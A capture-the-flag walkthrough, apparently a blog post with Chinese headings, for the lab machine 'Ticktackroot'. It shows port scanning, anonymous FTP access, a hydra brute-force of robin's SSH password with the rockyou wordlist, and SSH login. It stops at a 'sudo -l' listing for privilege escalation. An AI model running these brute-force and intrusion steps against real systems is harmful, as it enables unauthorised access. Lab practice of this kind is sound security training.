[~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.43.58:21 Open 192.168.43.58:22 Open 192.168.43.58:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.58 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-20 02:10 EDT NSE: Loaded 157 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed Initiating ARP Ping Scan at 02:10 Scanning 192.168.43.58 [1 port] Completed ARP Ping Scan at 02:10, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:10 Completed Parallel DNS resolution of 1 host. at 02:10, 0.06s elapsed DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 02:10 Scanning 192.168.43.58 [3 ports] Discovered open port 22/tcp on 192.168.43.58 Discovered open port 80/tcp on 192.168.43.58 Discovered open port 21/tcp on 192.168.43.58 Completed SYN Stealth Scan at 02:10, 0.02s elapsed (3 total ports) Initiating Service scan at 02:10 Scanning 3 services on 192.168.43.58 Completed Service scan at 02:10, 11.01s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 192.168.43.58 NSE: Script scanning 192.168.43.58. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 02:10 NSE: [ftp-bounce 192.168.43.58:21] PORT response: 500 Illegal PORT command. Completed NSE at 02:10, 0.45s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.03s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed Nmap scan report for 192.168.43.58 Host is up, received arp-response (0.00056s latency). Scanned at 2026-04-20 02:10:11 EDT for 13s
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 0 0 10671 Oct 03 2024 index.html |_drwxr-xr-x 2 0 0 4096 Oct 07 2024 login | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.43.50 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.5 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 5c:38:6e:8a:4b:bb:b4:2a:ca:cb:3a:94:62:9c:aa:7e (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLZUW2Q479diAO8OLSRUgHhkJX4pY63qqUmuo4zStvBN9T/HpEyZNGXWYdpZlEQtxXBqq/VoTd8mVb61ri7jw00= | 256 06:c4:ea:41:7d:c3:4b:f7:8c:68:19:6b:5c:23:e4:70 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMEPGyQ926eLS6k+yvt7edLlk4BeODs/OcqKBfEVqyex 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) | http-methods: |_ Supported Methods: OPTIONS HEAD GET POST |_http-title: Apache2 Ubuntu Default Page: It works MAC Address: 08:00:27:5B:6F:F3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.95%E=4%D=4/20%OT=21%CT=%CU=38839%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=69E5C350%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Uptime guess: 12.238 days (since Tue Apr 7 20:27:05 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.56 ms 192.168.43.58
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 02:10 Completed NSE at 02:10, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds Raw packets sent: 30 (2.162KB) | Rcvd: 44 (3.350KB)
┌──(root㉿kali)-[~] └─# ftp 192.168.43.58 Connected to 192.168.43.58. 220 Bienvenido Robin Name (192.168.43.58:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||24619|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 10671 Oct 03 2024 index.html drwxr-xr-x 2 0 0 4096 Oct 07 2024 login 226 Directory send OK. ftp> cd login 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||44347|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 14 Oct 07 2024 login.txt 226 Directory send OK. ftp> get login.txt local: login.txt remote: login.txt 229 Entering Extended Passive Mode (|||35992|) 150 Opening BINARY mode data connection for login.txt (14 bytes). 100% |*********************************************************************************| 14 16.19 KiB/s 00:00 ETA 226 Transfer complete. 14 bytes received in 00:00 (5.85 KiB/s) ftp>
在登录的时候显示了欢迎Robin
hydra枚举Robin的密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(root㉿kali)-[/opt/CVE/TinyFileManager-File-Upload-RCE-Exploit] └─# hydra -l robin -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.58 -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-20 02:14:47 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task [DATA] attacking ssh://192.168.43.58:22/ [22][ssh] host: 192.168.43.58 login: robin password: babyblue 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 23 final worker threads did not complete until end. [ERROR] 23 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-20 02:15:31
┌──(root㉿kali)-[/opt/CVE/TinyFileManager-File-Upload-RCE-Exploit] └─# ssh robin@192.168.43.58 The authenticity of host '192.168.43.58 (192.168.43.58)' can't be established. ED25519 key fingerprint is SHA256:AbcLfoRO5xqCMsRNSIrZgMMbg/qvciy2F5kfxTJLfMA. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.43.58' (ED25519) to the list of known hosts. robin@192.168.43.58's password: Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)
System information as of mar 15 oct 2024 08:45:45 UTC
System load: 0.06 Processes: 113 Usage of /: 51.1% of 4.93GB Users logged in: 1 Memory usage: 9% IPv4 address for enp0s3: 192.168.18.52 Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment.
El mantenimiento de seguridad expandido para Applications está desactivado
Se pueden aplicar 3 actualizaciones de forma inmediata. Para ver estas actualizaciones adicionales, ejecute: apt list --upgradable
Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales. Vea https://ubuntu.com/esm o ejecute «sudo pro status»
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Tue Oct 15 08:45:45 2024 from 192.168.18.48 robin@TheHackersLabs-Ticktackroot:~$ id uid=1001(robin) gid=1001(robin) groups=1001(robin),100(users) robin@TheHackersLabs-Ticktackroot:~$
提权
robin -> root
1 2 3 4 5 6
robin@TheHackersLabs-Ticktackroot:~$ sudo -l Matching Defaults entries for robin on TheHackersLabs-Ticktackroot: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User robin may run the following commands on TheHackersLabs-Ticktackroot: (ALL) NOPASSWD: /usr/bin/timeout_suid